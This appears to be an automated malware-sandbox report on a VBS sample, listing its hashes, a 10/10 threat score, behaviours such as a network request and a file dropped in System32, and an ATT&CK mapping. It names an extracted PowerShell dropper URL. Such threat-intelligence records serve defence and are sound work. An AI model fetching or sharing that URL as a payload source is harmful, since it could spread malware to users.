Overview

overview

10

Static

static

a1da68589d...1).vbs

windows7_x64

10

a1da68589d...1).vbs

windows10_x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    a1da68589d64579861eee36d941429c59b33f527e5b5639e42cba0c97d7f1181 (1)

  • Size

    4KB

  • Sample

    210421-t5f8g6t9r2

  • MD5

    25e566c75a0a96543265794571364d6b

  • SHA1

    6f213ef7bd175a4815ce266fe8a1824a0884cf81

  • SHA256

    a1da68589d64579861eee36d941429c59b33f527e5b5639e42cba0c97d7f1181

  • SHA512

    294d587a88cd4504a446741acce25a547ac8b928201ddf7071996306fc40dd5a9119120f9875a798ca8caac55b71130c421a91b3bcdcc659c58f95f599ce55e2

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://eu.aemaccounting.com/platform.html?id=303

Targets

    • Target

      a1da68589d64579861eee36d941429c59b33f527e5b5639e42cba0c97d7f1181 (1)

    • Size

      4KB

    • MD5

      25e566c75a0a96543265794571364d6b

    • SHA1

      6f213ef7bd175a4815ce266fe8a1824a0884cf81

    • SHA256

      a1da68589d64579861eee36d941429c59b33f527e5b5639e42cba0c97d7f1181

    • SHA512

      294d587a88cd4504a446741acce25a547ac8b928201ddf7071996306fc40dd5a9119120f9875a798ca8caac55b71130c421a91b3bcdcc659c58f95f599ce55e2

    Score
    10/10

    • Blocklisted process makes network request

    • Drops file in System32 directory

    behavioral1behavioral2

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Tasks